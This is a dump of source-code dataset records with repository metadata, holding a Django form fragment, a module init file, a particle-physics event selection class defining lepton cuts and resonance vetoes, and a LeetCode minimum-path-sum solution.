fields = ('comentario',)
widgets = {
'comentario': Textarea(
attrs={
'class': 'form-control',
}
),
}
| [
"[email protected]"
] | |
9d970a6420fe907b2979185d2b48aa7ae78262f1 | 5c61990fc1a79f389111a3e449c1fadf65fc1b8c | /portnet_reports/indicateurs_financier/__init__.py | b8f88826d9a9cd5ecc4a5bc263880c787dbaefa2 | [] | no_license | brahim94/portnet | 3befb64009fd014b74e01151cc429a613d3d2f11 | f1120ce4806ba2fd7e26132ca918d1ce8b9ad32c | refs/heads/master | 2023-04-14T07:17:40.956207 | 2021-04-27T16:37:48 | 2021-04-27T16:37:48 | 356,211,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | import financial_indicator
| [
"[email protected]"
] | |
81b9658d7beef3f5af94d215949d0df32e66dc26 | df8ec66b10e97956f80ec52503dd456372c03c4a | /plotter/objects/selections.py | b4d32bd707d2c9a8132f64b9d47eda95be2cf1ba | [] | no_license | amlyon/plotter | 3670820faf9864501b666f2e157e435a8285a766 | 5a3295fbf5d0875fd4a1c53164ac45e92d3ccd05 | refs/heads/master | 2022-11-17T02:27:42.072710 | 2020-07-07T20:19:25 | 2020-07-07T20:19:25 | 270,580,472 | 0 | 0 | null | 2020-06-23T14:55:25 | 2020-06-08T07:56:20 | Python | UTF-8 | Python | false | false | 10,048 | py | from collections import OrderedDict
class Selections(object):
def __init__(self, channel):
self.channel = channel
self.base = None
self.selections = OrderedDict()
if self.channel == 'mmm':
self.selections['pt_iso'] = ' & '.join(['l0_pt > 25' ,
'l2_pt > 5' ,
'l1_pt > 5' ,
'l0_id_m == 1' ,
'l1_id_hnl_m == 1',
'l2_id_hnl_m == 1',])
if self.channel == 'mem':
self.selections['pt_iso'] = ' & '.join(['l0_pt > 25' ,
'l2_pt > 5' ,
'l1_pt > 5' ,
'l0_id_m == 1' ,
'l1_id_hnl_l_niso == 1' ,
'l2_id_hnl_m == 1' ,])
if self.channel == 'eem':
self.selections['pt_iso'] = ' & '.join(['l0_pt > 32' ,
'l2_pt > 5' ,
'l1_pt > 5' ,
'l0_id_mva_niso_90 == 1',
'l1_id_hnl_l_niso == 1' ,
'l2_id_hnl_m == 1' ,])
if self.channel == 'eee':
self.selections['pt_iso'] = ' & '.join(['l0_pt > 32' ,
'l2_pt > 5' ,
'l1_pt > 5' ,
'l0_id_mva_niso_90 == 1',
'l1_id_hnl_l_niso == 1' ,
'l2_id_hnl_l_niso == 1' ,])
assert self.selections['pt_iso'], 'Error: No channel specific selection applied!'
self.selections['pre_baseline'] = ' & '.join([
'abs(l0_eta) < 2.4' ,
'abs(l0_dxy) < 0.05' ,
'abs(l0_dz) < 0.1' ,
'l0_reliso_rho_03 < 0.1',
'abs(l1_eta) < 2.4' ,
'l1_reliso_rho_03 < 10' ,
'abs(l2_eta) < 2.4' ,
'l2_reliso_rho_03 < 10' ,
'hnl_q_12 == 0' ,
'hnl_dr_12 < 1.' ,
'hnl_dr_12 > 0.02' ,
'hnl_m_12 < 20' ,
'abs(hnl_dphi_01)>1.' ,
'abs(hnl_dphi_02)>1.' , # dphi a la facon belgique
'pass_met_filters==1' ,
])
self.selections['baseline'] = ' & '.join([
self.selections['pre_baseline'],
'nbj == 0' ,
'hnl_2d_disp_sig>20' ,
'hnl_pt_12>15' ,
'sv_cos>0.99' ,
'sv_prob>0.001' ,
'abs(l1_dz)<10' ,
'abs(l2_dz)<10' ,
'abs(l1_dxy) > 0.01' ,
'abs(l2_dxy) > 0.01' ,
])
self.selections['sideband'] = '!(hnl_w_vis_m > 50. & hnl_w_vis_m < 80.)' # THIS IS IMPORTANT!
self.selections['signal_region'] = '(hnl_w_vis_m > 50. & hnl_w_vis_m < 80.)' # THIS IS IMPORTANT!
# FSR veto
# remove events where the tree lepton make the Z mass
# and at least two same flavour OS leptons are present
self.selections['fsr_veto'] = '( (abs(hnl_w_vis_m-91.19)>10. & (l0_pdgid==-l1_pdgid | l0_pdgid==-l2_pdgid)) | !(l0_pdgid==-l1_pdgid | l0_pdgid==-l2_pdgid))'
# self.selections['vetoes_12_OS'] = ' & '.join([
# # vetoes 12 (always OS anyways)
# 'abs(hnl_m_12-3.0969) > 0.08' , # jpsi veto
# 'abs(hnl_m_12-3.6861) > 0.08' , # psi (2S) veto
# 'abs(hnl_m_12-0.7827) > 0.08' , # omega veto
# 'abs(hnl_m_12-1.0190) > 0.08' , # phi veto
# ])
# after discussing with Martina 9/1/2020
self.selections['vetoes_12_OS'] = ' & '.join([
# vetoes 12 (always OS anyways)
'!(hnl_2d_disp<1.5 & abs(hnl_m_12-3.0969) < 0.08)', # jpsi veto
'!(hnl_2d_disp<1.5 & abs(hnl_m_12-3.6861) < 0.08)', # psi (2S) veto
'!(hnl_2d_disp<1.5 & abs(hnl_m_12-0.7827) < 0.08)', # omega veto
'!(hnl_2d_disp<1.5 & abs(hnl_m_12-1.0190) < 0.08)', # phi veto
])
self.selections['vetoes_01_OS'] = ' & '.join([
# vetoes 01 (only is OS)
'!(hnl_q_01==0 & abs(hnl_m_01-91.1876) < 10)' , # Z veto
'!(hnl_q_01==0 & abs(hnl_m_01- 9.4603) < 0.08)', # Upsilon veto
'!(hnl_q_01==0 & abs(hnl_m_01-10.0233) < 0.08)', # Upsilon (2S) veto
'!(hnl_q_01==0 & abs(hnl_m_01-10.3552) < 0.08)', # Upsilon (3S) veto
'!(hnl_q_01==0 & abs(hnl_m_01-3.0969) < 0.08)', # jpsi veto
'!(hnl_q_01==0 & abs(hnl_m_01-3.6861) < 0.08)', # psi (2S) veto
'!(hnl_q_01==0 & abs(hnl_m_01-0.7827) < 0.08)', # omega veto
'!(hnl_q_01==0 & abs(hnl_m_01-1.0190) < 0.08)', # phi veto
])
self.selections['vetoes_02_OS'] = ' & '.join([
# vetoes 02 (only is OS)
'!(hnl_q_02==0 & abs(hnl_m_02-91.1876) < 10)' , # Z veto
'!(hnl_q_02==0 & abs(hnl_m_02- 9.4603) < 0.08)', # Upsilon veto
'!(hnl_q_02==0 & abs(hnl_m_02-10.0233) < 0.08)', # Upsilon (2S) veto
'!(hnl_q_02==0 & abs(hnl_m_02-10.3552) < 0.08)', # Upsilon (3S) veto
'!(hnl_q_02==0 & abs(hnl_m_02-3.0969) < 0.08)', # jpsi veto
'!(hnl_q_02==0 & abs(hnl_m_02-3.6861) < 0.08)', # psi (2S) veto
'!(hnl_q_02==0 & abs(hnl_m_02-0.7827) < 0.08)', # omega veto
'!(hnl_q_02==0 & abs(hnl_m_02-1.0190) < 0.08)', # phi veto
])
self.selections['tight'] = ' & '.join([
'l1_reliso_rho_03 < 0.2',
'l2_reliso_rho_03 < 0.2',
])
# RM is this wrong? this allows for one of the two displaced leptons to be
# neither prompt nor conversion
# self.selections['is_prompt_lepton'] = '(%s)' %(' | '.join([
# 'l1_gen_match_isPrompt==1',
# 'l1_gen_match_pdgid==22',
# 'l2_gen_match_isPrompt==1',
# 'l2_gen_match_pdgid==22',
# ]))
self.selections['is_prompt_lepton'] = ' & '.join([
'(l1_gen_match_isPrompt==1 | l1_gen_match_pdgid==22)',
'(l2_gen_match_isPrompt==1 | l2_gen_match_pdgid==22)',
])
self.selections['zmm'] = ' & '.join([
'l0_pt > 40' ,
'abs(l0_eta) < 2.4' ,
'abs(l0_dxy) < 0.05' ,
'abs(l0_dz) < 0.2' ,
'l0_reliso_rho_03 < 0.2',
'l0_id_t == 1' ,
'l1_pt > 35' ,
'abs(l1_eta) < 2.4' ,
'abs(l1_dxy) < 0.05' ,
'abs(l1_dz) < 0.2' ,
'l1_reliso_rho_03 < 0.2',
'l1_id_t == 1' ,
'hnl_q_01==0' ,
'abs(hnl_dphi_01)>1.' ,
'pass_met_filters==1' ,
])
self.selections['zee'] = ' & '.join([
'l0_pt > 40' ,
'abs(l0_eta) < 2.4' ,
'abs(l0_dxy) < 0.05' ,
'abs(l0_dz) < 0.2' ,
'l0_reliso_rho_03 < 0.2',
'l0_id_mva_niso_90 == 1' ,
'l1_pt > 35' ,
'abs(l1_eta) < 2.4' ,
'abs(l1_dxy) < 0.05' ,
'abs(l1_dz) < 0.2' ,
'l1_reliso_rho_03 < 0.2',
'l1_id_mva_niso_90 == 1',
'hnl_q_01==0' ,
'abs(hnl_dphi_01)>1.' ,
'pass_met_filters==1' ,
])
self.selections['ttbar_me*'] = ' & '.join([
'l0_pt > 28' ,
'abs(l0_eta) < 2.4' ,
'abs(l0_dxy) < 0.05' ,
'abs(l0_dz) < 0.2' ,
'l0_reliso_rho_03 < 0.2',
'l0_id_m == 1' ,
'l1_pt > 10' ,
'abs(l1_eta) < 2.4' ,
'abs(l1_dxy) < 0.05' ,
'abs(l1_dz) < 0.2' ,
'l1_reliso_rho_03 < 0.2',
'l1_id_mva_iso_90 == 1' ,
'hnl_q_01==0' ,
'nbj>=1' ,
'abs(hnl_dphi_01)>1.' ,
'pass_met_filters==1' ,
])
self.selections['ttbar_em*'] = ' & '.join([
'l0_pt > 28' ,
'abs(l0_eta) < 2.4' ,
'abs(l0_dxy) < 0.05' ,
'abs(l0_dz) < 0.2' ,
'l0_reliso_rho_03 < 0.2',
'l0_id_mva_iso_90 == 1' ,
'l2_pt > 10' ,
'abs(l2_eta) < 2.4' ,
'abs(l2_dxy) < 0.05' ,
'abs(l2_dz) < 0.2' ,
'l2_reliso_rho_03 < 0.2',
'l2_id_m == 1' ,
'hnl_q_02==0' ,
'nbj>=1' ,
'abs(hnl_dphi_02)>1.' ,
'pass_met_filters==1' ,
])
# convert to pandas readable queries
self.selections_pd = OrderedDict()
for k, v in self.selections.items():
vv = v.replace('&', 'and').replace('|', 'or').replace('!=', 'not').replace('!', 'not')
self.selections_pd[k] = vv
| [
"[email protected]"
] | |
7efb8ef9da9d77a2dea29542cdfeae246c6ad6d6 | a2b6bc9bdd2bdbe5871edb613065dd2397175cb3 | /Cookbook/Array/最小路径和.py | 8fcbf61420a03b424278ab65480d35b31e907523 | [] | no_license | Asunqingwen/LeetCode | ed8d2043a31f86e9e256123439388d7d223269be | b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee | refs/heads/master | 2022-09-26T01:46:59.790316 | 2022-09-01T08:20:37 | 2022-09-01T08:20:37 | 95,668,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | '''
给定一个包含非负整数的 m x n 网格 grid ,请找出一条从左上角到右下角的路径,使得路径上的数字总和为最小。
说明:每次只能向下或者向右移动一步。
示例 1:
输入:grid = [[1,3,1],[1,5,1],[4,2,1]]
输出:7
解释:因为路径 1→3→1→1→1 的总和最小。
示例 2:
输入:grid = [[1,2,3],[4,5,6]]
输出:12
提示:
m == grid.length
n == grid[i].length
1 <= m, n <= 200
0 <= grid[i][j] <= 100
'''
from typing import List
class Solution:
def minPathSum(self, grid: List[List[int]]) -> int:
row, col = len(grid), len(grid[0])
for r in range(1, row):
grid[r][0] += grid[r - 1][0]
for c in range(1, col):
grid[0][c] += grid[0][c - 1]
for r in range(1, row):
for c in range(1, col):
grid[r][c] += min(grid[r - 1][c], grid[r][c - 1])
return grid[-1][-1]
if __name__ == '__main__':
grid = [[1, 3, 1], [1, 5, 1], [4, 2, 1]]
sol = Solution()
print(sol.minPathSum(grid))
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.